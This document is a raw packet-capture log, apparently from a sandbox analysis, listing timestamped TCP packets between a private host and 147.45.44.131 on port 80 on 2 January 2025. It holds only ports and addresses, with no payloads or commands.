Jan 2, 2025 19:14:14.684072971 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.684084892 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.684103012 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.684118986 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.685002089 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.685014009 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.685024977 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.685136080 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.685147047 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.685157061 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.685174942 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.685210943 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.685211897 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.685237885 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.685251951 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.685261965 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.685272932 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.685291052 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.685302019 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.685312986 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.685326099 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.685329914 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.685329914 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.685338020 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.685352087 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.685395956 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.685395956 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.686304092 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.686321974 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.686331987 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.686342001 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.686352968 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.686363935 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.686367035 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.686376095 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.686387062 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.686398029 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.686402082 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.686409950 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.686419964 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.686429977 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.686435938 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.686438084 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.686444044 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.686566114 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.686970949 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.687016964 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.687124968 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.765573978 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.765599966 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.765619040 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.765636921 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.765647888 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.765664101 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.765675068 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.765676975 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.765676975 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.765686035 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.765700102 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.765719891 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.765731096 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.765743017 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.765759945 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.765770912 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.765770912 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.765772104 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.765811920 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.765845060 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.766766071 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.766833067 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.766844034 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.766855001 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.766875029 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.766891956 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.766902924 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.766915083 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.766921997 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.766921997 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.766927958 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.766941071 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.767055988 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.767426014 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.767438889 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.767451048 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.767462015 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.767472982 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.767508030 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.767508030 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.767577887 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.767590046 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.767601013 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.767610073 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.767611027 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.767625093 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.767642975 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.767652988 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.767658949 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.767657995 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.767658949 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.767671108 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.767677069 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.767687082 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.767697096 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.767708063 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.767735004 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.767754078 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.767765999 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.767812014 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.767846107 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.768424988 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.768435955 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.768446922 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.768460035 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.768471003 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.768477917 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.768488884 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.768505096 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.768524885 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.768731117 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.768743038 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.768754005 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.768764019 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.768764973 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.768781900 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.768799067 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.768811941 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.768821955 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.768832922 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.768841982 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.768853903 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.768853903 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.768862963 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.768872023 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.768874884 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.768887997 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.768899918 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.768908978 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.768917084 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.768934965 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.769001007 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.769012928 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.769020081 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.769031048 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.769052029 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.769052029 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.769123077 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.769136906 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.769149065 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.769160032 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.769171000 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.769181013 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.769198895 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.769211054 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.769224882 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.769262075 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.769262075 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.769294024 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.769305944 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.769320965 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.769339085 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.769351006 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.769359112 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.769364119 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.769376040 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.769387007 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.769423962 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.769483089 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.769483089 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.769483089 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.769501925 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.769675970 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.769942999 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.769954920 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.769965887 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.769984007 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.769994974 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770000935 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770011902 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770020008 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.770034075 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.770098925 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770109892 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770122051 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770133018 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770143032 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770148039 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770150900 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.770164967 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770195961 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770214081 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.770243883 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770255089 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770265102 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770267010 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.770276070 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770308018 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.770308018 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.770334005 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770404100 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.770414114 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770425081 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770436049 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770446062 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770457029 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770468950 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770476103 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.770483971 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.770548105 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.770569086 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770586014 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770602942 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770612955 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770623922 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770636082 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770639896 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.770648003 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770658970 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770663023 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.770670891 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.770704031 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.770724058 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.852688074 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.852709055 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.852722883 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.852734089 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.852746010 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.852757931 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.852765083 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.852768898 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.852782965 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.852802992 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.852878094 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.853763103 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.853774071 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.853784084 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.853825092 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.853835106 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.853847980 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.853847980 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.853852987 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.853866100 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.853877068 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.853885889 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.853909016 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.853950024 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.853962898 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.853985071 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.853995085 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.854001999 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.854006052 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.854020119 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.854029894 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.854059935 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.854082108 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.854082108 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.854123116 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.854154110 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.854166031 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.854177952 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.854196072 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.854207039 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.854217052 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.854228020 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.854247093 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.854259014 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.854283094 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.854283094 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.854320049 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.854362011 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.854366064 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.854383945 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.854396105 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.854404926 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.854424000 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.854427099 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.854435921 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.854446888 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.854453087 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.854454041 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.854491949 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.854541063 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.855300903 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855377913 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855389118 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855406046 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855413914 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.855415106 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855427027 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855438948 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855448961 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855458021 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.855458975 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855458021 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.855477095 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855489016 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855494022 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.855500937 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855510950 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855529070 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855532885 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.855540991 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855550051 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.855552912 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855592012 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855602980 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855612993 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855622053 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.855640888 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855659008 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.855664015 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855669975 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.855676889 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855706930 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855715990 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855731010 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855741024 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.855750084 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855762959 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855772972 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855775118 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.855791092 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.855834007 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.855835915 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855884075 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855920076 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855922937 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.855952978 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855964899 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.855971098 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856025934 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856036901 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856043100 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856048107 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856054068 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856132030 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.856167078 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856179953 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856190920 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856193066 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.856205940 CET	80	49721	147.45.44.131	192.168.2.5
